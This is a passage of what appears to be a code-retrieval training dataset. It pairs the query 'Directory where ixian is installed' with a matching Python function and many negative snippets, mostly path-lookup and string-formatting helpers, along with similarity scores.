bullet:\n ori_bullet = self._bullet\n self._bullet = bullet\n self._update()\n result = self._format_aux(obj,\n style=style,\n key_style=key_style)\n self._bullet = ori_bullet\n self._update()\n return result\n else:\n return self._format_aux(obj, style=style, key_style=key_style)\n else:\n return self._format_aux(obj, style=style, key_style=key_style)", "def format(value):\n if isinstance(value, str):\n return '\"{}\"'.format(value)\n if isinstance(value, bool):\n return 'true' if value is True else 'false'\n elif isinstance(value, dict):\n assert False, 'Not implemented for dictionary type'\n elif hasattr(value, '__len__'): # should cover list and numpy array\n return '{{{}}}'.format(', '.join([str(v) for v in value]))\n else: # assume scalar value\n return value", "def format(value, arg):\n try:\n if value is not None:\n # return (str(arg)) % value\n return (str(value)) % arg\n else:\n return \"\"\n except (ValueError, TypeError):\n return \"\"", "def pytest_configure(config):\n set_default_log_formatter(config, \"%(message)s\")", "def __str__(self):\n if len(self.__keys) == 0:\n return '{}'\n output = '{'\n fmt = '{}: {}, '\n for key, val in zip(self.__keys, self.__vals):\n output += fmt.format(repr(key), repr(val))\n return output[:-2] + '}'", "def get_formatted_messages(formats, label, context):\r\n format_templates = {}\r\n for format in formats:\r\n # conditionally turn off autoescaping for .txt extensions in format\r\n if format.endswith(\".txt\"):\r\n context.autoescape = False\r\n format_templates[format] = render_to_string((\r\n 'notification/%s/%s' % (label, format),\r\n 'notification/%s' % format), context_instance=context)\r\n return format_templates", "def __format__(self, format_spec: 
str) -> str:\n\n return format(self.balance, format_spec)", "def format_yaml(yaml, **kwargs):\n template = _YamlTemplate(yaml)\n try:\n return template.substitute(flatten(kwargs or {},\n reducer='dot'))\n except KeyError as e:\n raise RuntimeError(\n 'Unknown placeholder: {}'.format(e.args[0])) from e", "def test_print_config(self) -> None:\n out = io.StringIO()\n with contextlib.redirect_stdout(out):\n self.config.print()\n self.assertEqual(\n out.getvalue().rstrip(),\n \"{}: {}\\n{}\".format(\"q2\", \"abcdefghij\", \"^\".rjust(7)),\n )", "def autoformat(\n cls: Type[U] = None,\n /,\n params: Union[str, Iterable[str]] = ( # pylint: disable=unsubscriptable-object\n \"message\",\n \"msg\",\n ),\n):\n if isinstance(params, str):\n params = (params,)\n\n if cls is None:\n return functools.partial(autoformat, params=params)\n\n orig_init = cls.__init__\n signature = inspect.signature(orig_init)\n params = signature.parameters.keys() & set(params)\n\n @functools.wraps(orig_init)\n def init(*args, **kwargs):\n bounds = signature.bind(*args, **kwargs)\n bounds.apply_defaults()\n pre_formatted = {\n name: bounds.arguments.pop(name)\n for name in params\n if name in bounds.arguments\n }\n formatted = {\n name: string.format(**bounds.arguments)\n for name, string in pre_formatted.items()\n }\n for name, arg in formatted.items():\n bounds.arguments[name] = arg\n return orig_init(*bounds.args, **bounds.kwargs)\n\n # init.__signature__ = signature\n setattr(cls, \"__init__\", init)\n return cls", "def formatted(self) -> str:\r\n ...", "def render_build_args(options, ns):\n build_args = options.get('buildArgs', {})\n for key, value in build_args.items():\n build_args[key] = value.format(**ns)\n return build_args", "def format_config(config, endpoint_name):\n rest_endpoint = config[\"RECORDS_REST_ENDPOINTS\"][endpoint_name]\n api_list_route = \"/api{}\".format(rest_endpoint[\"list_route\"])\n api_mimetype = rest_endpoint[\"default_media_type\"]\n search_index = rest_endpoint[\"search_index\"]\n sort_options = config.get(\"RECORDS_REST_SORT_OPTIONS\", {}).get(\n search_index, {}\n )\n default_sort = config.get(\"RECORDS_REST_DEFAULT_SORT\", {}).get(\n search_index, {}\n )\n aggs = (\n config.get(\"RECORDS_REST_FACETS\", {})\n .get(search_index, {})\n .get(\"aggs\", {})\n )\n\n return {\n \"api\": api_list_route,\n \"mimetype\": api_mimetype,\n \"sort_options\": searchkit_sort_options(sort_options, default_sort),\n \"aggs\": searchkit_aggs(aggs),\n }", "def pformat_in_needed(obj, indent=4):\n if obj:\n formatted_string = pprint.pformat(obj, indent)\n indented_string = ''\n for line in formatted_string.split('\\n'):\n indented_string = indented_string + '\\n' + (' ' * indent * 2) + line\n return \"\\n{}\\n\".format(indented_string)" ]
[ "0.61522377", "0.61236", "0.60001415", "0.57900184", "0.57206047", "0.57040524", "0.5618517", "0.5617663", "0.56145966", "0.56098795", "0.5547251", "0.55374193", "0.5514143", "0.54919505", "0.5468669", "0.54580975", "0.54474247", "0.54033774", "0.5401085", "0.53975976", "0.539324", "0.53666776", "0.5347559", "0.53226763", "0.5318113", "0.52701443", "0.52681345", "0.5237397", "0.5222003", "0.5207491", "0.5207452", "0.518739", "0.51698196", "0.5156693", "0.5141262", "0.51375973", "0.5131888", "0.51223344", "0.51095355", "0.5107207", "0.5100755", "0.5098541", "0.5095662", "0.50955194", "0.5095053", "0.50936043", "0.5088247", "0.5085643", "0.50483036", "0.50182486", "0.5014046", "0.50110936", "0.5007818", "0.4997547", "0.49834123", "0.49772367", "0.49744326", "0.49743414", "0.4972733", "0.4961685", "0.49573478", "0.49546337", "0.49313325", "0.49242777", "0.49238962", "0.49175325", "0.49060982", "0.49056467", "0.48990154", "0.4884665", "0.48796248", "0.48590782", "0.48567155", "0.4852063", "0.4850981", "0.48498344", "0.48405844", "0.48275664", "0.4821687", "0.4819427", "0.4812204", "0.48069933", "0.480344", "0.4799001", "0.47931173", "0.4787891", "0.47863007", "0.47804224", "0.47734344", "0.47707477", "0.47688705", "0.4744038", "0.47432524", "0.47423226", "0.47406474", "0.47368243", "0.47349358", "0.47286054", "0.4728517", "0.47268125" ]
0.75447696
0
Directory where ixian is installed
def IXIAN(cls):\n    import ixian\n\n    return os.path.dirname(os.path.realpath(ixian.__file__))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_teamocil_dir() -> pathlib.Path:\n return pathlib.Path(\"~/.teamocil/\").expanduser()", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/madgraph5/src\"", "def get_installdir(self):\n import mewlo\n path = os.path.dirname(os.path.realpath(mewlo.__file__))\n return path", "def ifaces_dir(self):\n return self.system_path(self._ifaces_dir)", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/madgraph4/src\"", "def eplus_home(self):\n if self.idf.file_version <= Version(\"7.2\"):\n install_dir = self.idf.file_version.current_install_dir / \"bin\"\n else:\n install_dir = (\n self.idf.file_version.current_install_dir\n / \"PreProcess\"\n / \"GrndTempCalc\"\n )\n return install_dir.expand()", "def GetPackageDirectory():\n return os.path.dirname(__file__)", "def systemdir():\n if platform == 'windows':\n return os.path.join(os.environ['ProgramFiles'], 'automaton')\n else:\n return \"/etc/automaton/\"", "def package_dir(self):\r\n return \".\"", "def get_qiime_scripts_dir():\r\n script_fp = which('print_qiime_config.py')\r\n\r\n if script_fp is None:\r\n raise ScriptsDirError(\"Could not find the directory containing QIIME \"\r\n \"scripts. QIIME scripts must be accessible via \"\r\n \"the PATH environment variable, and they must \"\r\n \"be executable. Please ensure that you have a \"\r\n \"valid QIIME installation (see the QIIME \"\r\n \"Installation Guide: \"\r\n \"http://qiime.org/install/install.html).\")\r\n\r\n return dirname(script_fp)", "def personaldir():\n if platform == 'windows':\n return os.path.join(os.environ['APPDATA'], 'automaton')\n else:\n return os.path.expanduser('~/.automaton/')", "def rliPath():\r\n if isWindows():\r\n homeDir = win32api.GetShortPathName(os.path.expanduser('~'))\r\n return os.path.join(homeDir, 'AppData', 'Roaming', 'GRASS7', 'r.li')\r\n else:\r\n return os.path.join(os.path.expanduser(\"~\"), '.grass7', 'r.li')", "def path(self):\n installed_packages_folder_path = site.getsitepackages()[0]\n return f'{installed_packages_folder_path}/{SITE_PACKAGES_FOLDER_NAME}'", "def syspath():\n import sys\n pprint(sys.path)", "def home():\n if sys.prefix == sys.exec_prefix:\n return sys.prefix\n else:\n return ':'.join((sys.prefix, sys.exec_prefix))", "def get_axebindir():\n import sys\n\n if 'axesrc' in sys.modules:\n modfile = sys.modules['axesrc'].__file__\n axebindir = os.path.abspath(os.path.join(os.path.dirname(modfile),'../bin/'))\n\n else:\n from pyraf import iraf\n\n # just read all variables\n all_variables = iraf.getVarDict()\n\n arch = all_variables['arch']\n stsdas = all_variables['stsdas']\n # compose the bin directory\n axebindir = os.path.join(stsdas, 'bin'+arch)\n #axe = all_variables['axe']\n #axebindir = all_variables['axebin']\n\n # compose the bin directory\n #axebindir = os.path.join(axe, 'bin')\n\n # return the path\n return axebindir", "def radishdir():\n return __RADISH_FILES_DIR__", "def install_location(self):\r\n return self._content_at_path('/template/os/install/%s' % self.install_type)", "def datadir():\n return '../data/'", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/egs5\"", "def sirv_truth_dir(self):\n return op.join(self.root_dir, \"SIRV\")", "def lib_dir(self):\n raise NotImplementedError('Implement this property.')", "def get_qiime_project_dir():\r\n # Get the full path of util.py\r\n current_file_path = abspath(__file__)\r\n # Get the directory containing util.py\r\n current_dir_path = dirname(current_file_path)\r\n # Return the 
directory containing the directory containing util.py\r\n return dirname(current_dir_path)", "def set_syspath(self, hasal_dir):\n library_path = os.path.join(hasal_dir, \"lib\", \"sikuli\")\n sys.path.append(library_path)\n return library_path", "def get_enry_dir() -> str:\n return os.path.abspath(os.path.join(os.path.dirname(__file__), \"build\"))", "def thisdir():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n # Change this bit to match where you store your data files:\n return os.path.dirname(__file__)", "def dcm2niix() -> str:\n fsldir = fslplatform.platform.fsldir\n candidates = [\n shutil.which('dcm2niix')\n ]\n\n if fsldir is not None:\n candidates.insert(0, op.join(fsldir, 'bin', 'dcm2niix'))\n\n for c in candidates:\n if c is not None and op.exists(c):\n return c\n\n return 'dcm2niix'", "def root_dir():\n return dirname(dirname(__file__))", "def get_int_dir():\n try:\n int_dir = os.environ[\"INT_DIR\"]\n except KeyError:\n int_dir = input(\"Enter the (full path) directory \"\n \"where your interactions are stored: \")\n os.system(f\"echo 'export INT_DIR=\\\"{int_dir}\\\"\\n' >> ~/.bash_profile\")\n os.system(\". ~/.bash_profile\")\n return int_dir", "def user_conf_dir(self):\n return os.path.join(BaseDirectory.xdg_config_home, \"speech-dispatcher\")", "def ivy_cache_dir(self):\r\n return self._ivy_cache_dir", "def root_dir():\r\n return Path(__file__).parent.parent", "def path(self):\r\n if self._root_dir is None:\r\n if 'PANTS_BUILD_ROOT' in os.environ:\r\n self._root_dir = os.environ['PANTS_BUILD_ROOT']\r\n else:\r\n buildroot = os.path.abspath(os.getcwd())\r\n while not os.path.exists(os.path.join(buildroot, 'pants.ini')):\r\n if buildroot != os.path.dirname(buildroot):\r\n buildroot = os.path.dirname(buildroot)\r\n else:\r\n raise self.NotFoundError('Could not find pants.ini!')\r\n self._root_dir = buildroot\r\n return self._root_dir", "def ipynb_path(self):\n return Path(self.dir_path, self.index_file + \".ipynb\").abspath", "def get_htdocs_dirs(self):\n from pkg_resources import resource_filename\n return [('inieditorpanel', resource_filename(__name__, 'htdocs'))]\n #return []", "def data_dir():\n #data_path = os.path.dirname(intervene.__file__)\n #data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'example_data')\n #print(data_path)\n return os.path.join(os.path.dirname(__file__), 'example_data')", "def homedir():\n return os.path.expanduser('~')", "def cache_directory(self):\n return ('/var/cache/npm-accel'\n if os.getuid() == 0 and os.access('/var/cache', os.W_OK)\n else parse_path('~/.cache/npm-accel'))", "def install_destination(self):\n # return self.install_dir\n return self.mainmanager.Folders['mods'].path / self._install_dirname", "def pathtofolder():\n return os.getcwd()", "def get_package_dir():\n return Path(__file__).parent", "def store_china_path(self):\n return path.join(env.store_home_china, self._store_path)", "def _build_system_home(self, directory):\n\t\treturn directory", "def base_dir(self):\n pass", "def rdap_info_cache_directory() -> str:\n current_path = Path(__file__).resolve().parent\n return os.path.join(current_path, 'cache', 'rdap')", "def get_enry() -> str:\n return os.path.abspath(os.path.join(get_enry_dir(), \"enry\"))", "def user_plugin_dir() -> str:\n return os.path.join(user_data_dir(), 'plugins')", "def GetCurrentDir(self) -> str:\n ...", "def get_disassembler_user_directory(self):\n pass", "def base_path(self):\n 
return self.setup.base_path", "def printSlipSystemDirectory():\n packageDir, _ = os.path.split(__file__)\n print(\"Slip system definition files are stored in directory:\")\n print(f\"{packageDir}/slip_systems/\")", "def cwd_in_path():\n ...", "def info_directory(self) -> Optional[str]:\n raise NotImplementedError()", "def test_get_qiime_scripts_dir(self):\r\n # get_qiime_scripts_dir will raise an error if it can't find a scripts\r\n # directory.\r\n scripts_dir = get_qiime_scripts_dir()\r\n self.assertTrue(isdir(scripts_dir), \"The QIIME scripts directory does \"\r\n \"not exist: %s\" % scripts_dir)", "def directory_root():\n\timport os\n\treturn os.path.join(os.path.dirname(__file__), '../..')", "def home_directory(self):\n out = self._call(\"GETHOMEDIRECTORY\")\n return out.json()[\"Path\"]", "def data_dir():\n return _config.datadir", "def get_current_directory():\n\treturn os.path.dirname(os.path.abspath(__file__))", "def get_tmuxinator_dir() -> pathlib.Path:\n if \"TMUXINATOR_CONFIG\" in os.environ:\n return pathlib.Path(os.environ[\"TMUXINATOR_CONFIG\"]).expanduser()\n\n return pathlib.Path(\"~/.tmuxinator/\").expanduser()", "def cifar10_root():\n import os\n load_config()\n path = os.environ.get('CIFARROOT', None)\n assert path is not None\n if not os.path.isdir(path):\n import torchvision\n torchvision.datasets.CIFAR10(path, download=True)\n return path", "def get_installation_path():\n file_abs_path = os.path.abspath(__file__)\n real_file_abs_path = os.path.realpath(file_abs_path)\n return real_file_abs_path[:real_file_abs_path.find('/node')]", "def get_root_directory() -> str:\n return \"{}/../\".format(get_cur_directory(__file__))", "def homeDirectory(self):\n\t\treturn self.__homeDirectory", "def _getSshDir():\n return f'{Path.home()}/.ssh'", "def get_htdocs_dirs(self):\n\t\tfrom pkg_resources import resource_filename\n\t\treturn [('hw', resource_filename(__name__, 'htdocs'))]", "def query_interface_path():\n import concordancer.server\n return str(pathlib.Path(concordancer.server.__file__).parents[0] / \"dist/index.html\")", "def get_denoiser_data_dir():\r\n dir = get_qiime_project_dir() + \"/qiime/support_files/denoiser/Data/\"\r\n return dir", "def default_output_path():\n\n documents = os.path.join(os.path.expanduser('~'))\n try:\n documents = _xdg_documents_path()\n except: pass\n if platform.system() == 'Windows':\n try:\n documents = _win_documents_path()\n except: pass\n\n return os.path.join(documents, 'Topographica')", "def getmodulepath(modulename):\n return USERLIBDIR + '\\\\' + modulename + '.sikuli\\\\' + modulename + '.py'", "def get_xshear_config_dir(run):\n d=get_run_dir(run)\n return os.path.join(d, 'config')", "def test_infodir(self):\n self.chck_triple('infodir')", "def dir_tester_unzip_tmp():\n return abspath('tmpunzip')", "def app_config_home(self) -> str:\n if self.app_config_has(\"app_config_home_directory\"):\n return self.app_config()[\"app_config_home_directory\"]\n return os.path.join(os.path.expanduser(\"~\"), '.aiscalator')", "def get_appdir():\n\n return APP_PATH", "def dir_bin():\n return abspath('bin')", "def get_import_dir(self):\n return Path(__file__).parent / 'import_data'", "def featurefiledir():\n return __FEATURE_FILES_DIR__", "def source_root_dir():\n return os.path.abspath(os.path.dirname(__file__))", "def configPath(self):\n return os.path.dirname(__file__)", "def sublime_haskell_package_path():\n return os.path.dirname(os.path.realpath(__file__))", "def tmpDir(package):\n\treturn 'debian/'+package", "def MODULE_DIR(cls) -> str:\n from 
ixian_docker.modules import webpack\n\n return os.path.dirname(os.path.realpath(webpack.__file__))", "def outputdir():\n return __OUTPUT_DIR__", "def path_notebooks():\n return os.path.abspath(\n os.path.join(os.path.dirname(__file__), os.path.pardir, \"examples\")\n )", "def get_htdocs_dirs(self):\n from pkg_resources import resource_filename\n return [('bl', resource_filename(__name__, 'htdocs'))]", "def setup_instr_root_path_McStas():\n THIS_DIR = os.path.dirname(os.path.abspath(__file__))\n\n current_work_dir = os.getcwd()\n os.chdir(THIS_DIR) # Set work directory to test folder\n\n instrument = McStas_instr(\"test_instrument\", package_path=\"/\")\n\n os.chdir(current_work_dir)\n\n return instrument", "def GetIdbDir():\n return os.path.dirname(ida_loader.get_path(ida_loader.PATH_TYPE_IDB)) + os.sep", "def menpowidgets_src_dir_path():\n # to avoid cluttering the menpowidgets.base namespace\n from pathlib import Path\n import os.path\n\n return Path(os.path.abspath(__file__)).parent", "def current_directory (self):\r\n pass", "def get_work_dir() -> str:\n env_work_dir = os.environ.get(\"AMBIANIC_DIR\", os.getcwd())\n if not env_work_dir:\n env_work_dir = DEFAULT_WORK_DIR\n return env_work_dir", "def _makeEnvir():\n if not os.path.exists(\"Reports\"):\n os.mkdir(\"Reports\")\n if not os.path.exists(\"Caches\"):\n os.mkdir(\"Caches\")\n if not os.path.exists(\"Caches/GOLD\"):\n # must run inside the package itself so __name__ works\n goldZipFile = pkg_resources.resource_filename(__name__, \"resources/GOLD.zip\")\n copy(goldZipFile, \"Caches\") \n print \"First time VDM is run - installing GOLD into %s\" % (os.getcwd() + \"/Caches\")\n ZipFile(os.getcwd() + \"/Caches/GOLD.zip\").extractall(os.getcwd() + \"/Caches\")", "def get_script_directory():\n return os.path.dirname(__file__)", "def module_path():\n return os.path.dirname(unicode(__file__, sys.getfilesystemencoding( )))", "def rootdir():\n return util.path(__file__).parent.parent.abspath()", "def output_dir(self):\n return os.path.join(self._sandbox, 'output' + os.path.sep)", "def source_directory(self):\r\n return self.pip_requirement.source_dir", "def get_root_dir():\n return os.path.dirname(os.path.dirname(__file__))", "def default_cache_dir() -> str:\n running_on_colab = 'google.colab' in sys.modules\n if running_on_colab:\n base_dir = '/tmp'\n else:\n base_dir = os.path.expanduser('~')\n cache_dir = os.path.join(base_dir, '.cache/fedjax')\n return cache_dir", "def config_path():\n dir_ = os.path.dirname(__file__)\n demo_dir = os.path.join(dir_, '../..')\n return os.path.join(demo_dir, 'mike_dev.ini')", "def _get_config_path():\n return os.path.join(os.path.expanduser('~'))" ]
[ "0.59720445", "0.5938821", "0.5927095", "0.59131306", "0.58979726", "0.586261", "0.5823516", "0.58234173", "0.5788261", "0.57610697", "0.5754324", "0.57422614", "0.5687996", "0.565429", "0.5623156", "0.56043833", "0.5588141", "0.5566707", "0.55413353", "0.55124944", "0.55004644", "0.5496944", "0.5494677", "0.5489928", "0.54826725", "0.54781085", "0.5447915", "0.54107183", "0.53995085", "0.5384671", "0.53831226", "0.53406465", "0.53245354", "0.53135103", "0.5311598", "0.530395", "0.52990335", "0.52967674", "0.52853817", "0.5281504", "0.5281464", "0.52763355", "0.52744377", "0.5273516", "0.52646047", "0.52589476", "0.5258185", "0.5257971", "0.52569705", "0.5254391", "0.52466244", "0.52440447", "0.52439576", "0.5240398", "0.52397025", "0.52223605", "0.5219328", "0.52187294", "0.52167207", "0.5216411", "0.5203562", "0.5196047", "0.519339", "0.5192297", "0.51890093", "0.5186633", "0.5181436", "0.51782995", "0.5177376", "0.51758546", "0.51751196", "0.5173907", "0.5173601", "0.51705056", "0.51631397", "0.5159389", "0.5157865", "0.5154565", "0.515412", "0.5150549", "0.51497865", "0.51466733", "0.5146236", "0.51439303", "0.5140132", "0.5139691", "0.5130021", "0.51272315", "0.51259553", "0.5123039", "0.512279", "0.5119487", "0.5118439", "0.5117998", "0.5117194", "0.51109713", "0.5110932", "0.5108703", "0.5108352", "0.5105646" ]
0.7647922
0
Directory where ixian was run from
def PWD(cls):\n    return pwd()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def IXIAN(cls):\n import ixian\n\n return os.path.dirname(os.path.realpath(ixian.__file__))", "def thisdir():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n # Change this bit to match where you store your data files:\n return os.path.dirname(__file__)", "def cwd(self):", "def GetCurrentDir(self) -> str:\n ...", "def cwd_in_path():\n ...", "def root_dir():\r\n return Path(__file__).parent.parent", "def get_script_directory():\n return os.path.dirname(__file__)", "def GetPackageDirectory():\n return os.path.dirname(__file__)", "def get_current_directory():\n\treturn os.path.dirname(os.path.abspath(__file__))", "def get_qiime_scripts_dir():\r\n script_fp = which('print_qiime_config.py')\r\n\r\n if script_fp is None:\r\n raise ScriptsDirError(\"Could not find the directory containing QIIME \"\r\n \"scripts. QIIME scripts must be accessible via \"\r\n \"the PATH environment variable, and they must \"\r\n \"be executable. Please ensure that you have a \"\r\n \"valid QIIME installation (see the QIIME \"\r\n \"Installation Guide: \"\r\n \"http://qiime.org/install/install.html).\")\r\n\r\n return dirname(script_fp)", "def root_dir():\n return dirname(dirname(__file__))", "def data_dir():\n #data_path = os.path.dirname(intervene.__file__)\n #data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'example_data')\n #print(data_path)\n return os.path.join(os.path.dirname(__file__), 'example_data')", "def current_directory (self):\r\n pass", "def directory_root():\n\timport os\n\treturn os.path.join(os.path.dirname(__file__), '../..')", "def get_teamocil_dir() -> pathlib.Path:\n return pathlib.Path(\"~/.teamocil/\").expanduser()", "def personaldir():\n if platform == 'windows':\n return os.path.join(os.environ['APPDATA'], 'automaton')\n else:\n return os.path.expanduser('~/.automaton/')", "def get_qiime_project_dir():\r\n # Get the full path of util.py\r\n current_file_path = abspath(__file__)\r\n # Get the directory containing util.py\r\n current_dir_path = dirname(current_file_path)\r\n # Return the directory containing the directory containing util.py\r\n return dirname(current_dir_path)", "def instance_dir(self):\n\t\treturn os.path.join(self.basedir, self.yml['instdir'])", "def pathtofolder():\n return os.getcwd()", "def setupRunDir(self):\n\n pass", "def systemdir():\n if platform == 'windows':\n return os.path.join(os.environ['ProgramFiles'], 'automaton')\n else:\n return \"/etc/automaton/\"", "def GetLauncherPath(self):\n return os.path.dirname(__file__)", "def GetLauncherPath(self):\n return os.path.dirname(__file__)", "def base_dir(self):\n pass", "def _get_R_script_dir(self):\r\n qiime_dir = get_qiime_project_dir()\r\n script_dir = join(qiime_dir, 'qiime', 'support_files', 'R')\r\n return script_dir", "def _get_R_script_dir(self):\r\n qiime_dir = get_qiime_project_dir()\r\n script_dir = join(qiime_dir, 'qiime', 'support_files', 'R')\r\n return script_dir", "def _get_R_script_dir(self):\r\n qiime_dir = get_qiime_project_dir()\r\n script_dir = join(qiime_dir, 'qiime', 'support_files', 'R')\r\n return script_dir", "def getScriptDirectory():\n\n\treturn os.path.dirname(os.path.realpath(__file__))", "def package_dir(self):\r\n return \".\"", "def datadir():\n return '../data/'", "def get_disassembler_user_directory(self):\n pass", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/madgraph5/src\"", "def cwd (self, path):\r\n pass", "def 
source_root_dir():\n return os.path.abspath(os.path.dirname(__file__))", "def get_root_directory() -> str:\n return \"{}/../\".format(get_cur_directory(__file__))", "def outputdir():\n return __OUTPUT_DIR__", "def get_installdir(self):\n import mewlo\n path = os.path.dirname(os.path.realpath(mewlo.__file__))\n return path", "def radishdir():\n return __RADISH_FILES_DIR__", "def rootdir():\n return util.path(__file__).parent.parent.abspath()", "def configPath(self):\n return os.path.dirname(__file__)", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/madgraph4/src\"", "def root_dir():\n return os.path.dirname(os.path.realpath(__file__ + '/..'))", "def root_dir():\n return os.path.dirname(os.path.realpath(__file__ + '/..'))", "def path(self):\r\n if self._root_dir is None:\r\n if 'PANTS_BUILD_ROOT' in os.environ:\r\n self._root_dir = os.environ['PANTS_BUILD_ROOT']\r\n else:\r\n buildroot = os.path.abspath(os.getcwd())\r\n while not os.path.exists(os.path.join(buildroot, 'pants.ini')):\r\n if buildroot != os.path.dirname(buildroot):\r\n buildroot = os.path.dirname(buildroot)\r\n else:\r\n raise self.NotFoundError('Could not find pants.ini!')\r\n self._root_dir = buildroot\r\n return self._root_dir", "def get_axebindir():\n import sys\n\n if 'axesrc' in sys.modules:\n modfile = sys.modules['axesrc'].__file__\n axebindir = os.path.abspath(os.path.join(os.path.dirname(modfile),'../bin/'))\n\n else:\n from pyraf import iraf\n\n # just read all variables\n all_variables = iraf.getVarDict()\n\n arch = all_variables['arch']\n stsdas = all_variables['stsdas']\n # compose the bin directory\n axebindir = os.path.join(stsdas, 'bin'+arch)\n #axe = all_variables['axe']\n #axebindir = all_variables['axebin']\n\n # compose the bin directory\n #axebindir = os.path.join(axe, 'bin')\n\n # return the path\n return axebindir", "def output_dir(self):\n return os.path.join(self._sandbox, 'output' + os.path.sep)", "def get_import_dir(self):\n return Path(__file__).parent / 'import_data'", "def rliPath():\r\n if isWindows():\r\n homeDir = win32api.GetShortPathName(os.path.expanduser('~'))\r\n return os.path.join(homeDir, 'AppData', 'Roaming', 'GRASS7', 'r.li')\r\n else:\r\n return os.path.join(os.path.expanduser(\"~\"), '.grass7', 'r.li')", "def get_root_dir():\n return os.path.dirname(os.path.dirname(__file__))", "def Directory(self) -> str:", "def sirv_truth_dir(self):\n return op.join(self.root_dir, \"SIRV\")", "def data_dir():\n return os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')", "def test_dir():\n return os.path.abspath(os.path.dirname(__file__))", "def workDir(self):\n self.debug.printHeader()\n #if hasattr(self.settings, \"workDir\"): toret=self.settings.workDir # 025 todo 143\n if self.settings.config.has_section(\"files\") and self.settings.config.has_option(\"files\",\"workDir\"):\n # toret=self.settings.get(\"files\",\"workDir\") 025\n toret=self.settings.workDir\n else: toret=os.environ['HOME']+'/xxz'\n # Also could write workdir back to settings.\n return toret", "def get_base_dir(self):\n dir_of_this_file = os.path.dirname(os.path.abspath(__file__))\n return os.path.dirname(dir_of_this_file)", "def get_enry_dir() -> str:\n return os.path.abspath(os.path.join(os.path.dirname(__file__), \"build\"))", "def get_output_path():\n return os.getcwd() + \"/output/\"", "def get_main_dir():\n return os.path.dirname(os.getcwd())", "def _get_path(): # THIS IS JUST FOR GETTING THE FILE\n return os.path.dirname(os.path.abspath(__file__)) + '/'", "def data_dir():\n 
return _config.datadir", "def base_path(self):\n return self.setup.base_path", "def location(self):\n\n p = os.path.abspath(__file__)\n pathSP = os.path.split(p)\n return pathSP", "def path_to_program_dir(self):\n\tpath = sys.argv[0]\n\n\tif not os.path.isdir(path):\n\t path = os.path.dirname(path)\n\n\tif not path: return '.'\n\n\treturn path", "def root_dir():\n return os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', \"..\")", "def get_working_directory():\n return os.getcwd()", "def module_path(self):\n return self.config['cwd']", "def project_root_files():\n return [\"parent_workflow.wdl\"]", "def _dir(self):\r\n self._h_dir = os.path.abspath(os.path.dirname(__file__))\r\n self._var_dir = os.path.join(self._h_dir, 'var')\r\n self._work_dir = os.path.join(self._h_dir, 'working')\r\n self._lib_dir = os.path.join(self._h_dir, 'lib')\r\n self._hylib_dir = os.path.join(self._lib_dir, 'hylib')\r\n self._hyutil_dir = os.path.join(self._lib_dir, 'hyutil')\r\n self._exe_dir = os.path.join(self._h_dir, 'exe')\r\n if not os.path.isdir(self._var_dir):\r\n os.mkdir(self._var_dir)\r\n if not os.path.isdir(self._work_dir):\r\n raise Exception('No HYSPLIT working directory found')\r\n for i in ['Error.txt', 'Queue.txt', 'Truncated.txt']:\r\n if not os.path.isfile(os.path.join(self._var_dir, i)):\r\n open(os.path.join(self._var_dir, i), 'w').close()", "def test_get_qiime_scripts_dir(self):\r\n obs = get_qiime_scripts_dir()\r\n\r\n # We can't do much testing of the observed value, but let's at least\r\n # check that the directory exists.\r\n self.assertTrue(isdir(obs))", "def get_appdir():\n\n return APP_PATH", "def ipynb_path(self):\n return Path(self.dir_path, self.index_file + \".ipynb\").abspath", "def menpowidgets_src_dir_path():\n # to avoid cluttering the menpowidgets.base namespace\n from pathlib import Path\n import os.path\n\n return Path(os.path.abspath(__file__)).parent", "def getRootPath()->str:\n if '--develop' in sys.argv:\n return eel._get_real_path('public') + '/'\n\n return eel._get_real_path('build') + '/'", "def dir(cls, config):\r\n # TODO(John Sirois): This is centralized, but in an awkward location. 
Isolate RunInfo reading\r\n # and writing in 1 package or class that could naturally know this location and synthesize\r\n # info_file names.\r\n return config.getdefault('info_dir',\r\n default=os.path.join(config.getdefault('pants_workdir'), 'runs'))", "def user_conf_dir(self):\n return os.path.join(BaseDirectory.xdg_config_home, \"speech-dispatcher\")", "def experiment_dir(experiment_name: str) -> Path: # pragma: no cover\n return EXPERIMENTS_DIR / experiment_name", "def get_base_dir(self):\n return self._config_dict['output']['@baseDirectory']", "def test():\n return os.path.dirname(__file__)", "def base_dir():\n return os.path.join(TrainFile.base_dir(), 'model')", "def find_path():\n __dir_path__ = os.path.dirname(os.path.realpath(__file__))\n return __dir_path__", "def getRootDirectory(self):\n if Globals.WORKFLOWS_BASEDIR[0] == '~':\n return os.path.expanduser(Globals.WORKFLOWS_BASEDIR)\n else:\n return os.path.join('', Globals.WORKFLOWS_BASEDIR)", "def ifaces_dir(self):\n return self.system_path(self._ifaces_dir)", "def GetSwigOutDir(cls):\n return os.path.join(FileUtils.GetEDir(), 'swig')", "def path_notebooks():\n return os.path.abspath(\n os.path.join(os.path.dirname(__file__), os.path.pardir, \"examples\")\n )", "def setUtilPath(self):\r\n utilpath.COMMANDER = _search_file(BASE_DIR,'Commander',True)[0]\r\n utilpath.STATBLOCKFIELDREADER = _search_file(BASE_DIR,'StatBlockFieldReader',True)[0]\r\n utilpath.HOSTMANAGER = _search_file(BASE_DIR,'HostManager',True)[0]\r\n utilpath.DATAVIEW = _search_file(TOOLS_DIR,'DataView',True)[0]", "def basepath():\n return os.path.abspath(\n os.path.join(\n os.path.dirname(__file__),\n '..'\n )\n )", "def get_package_dir():\n return Path(__file__).parent", "def test_data_dir(self):\n return os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')", "def getPath(self):\n path = os.path.dirname(os.path.realpath(__file__)) #Finds the path of the application\n path =(os.path.dirname(os.path.realpath(__file__))+ '\\\\Enigma 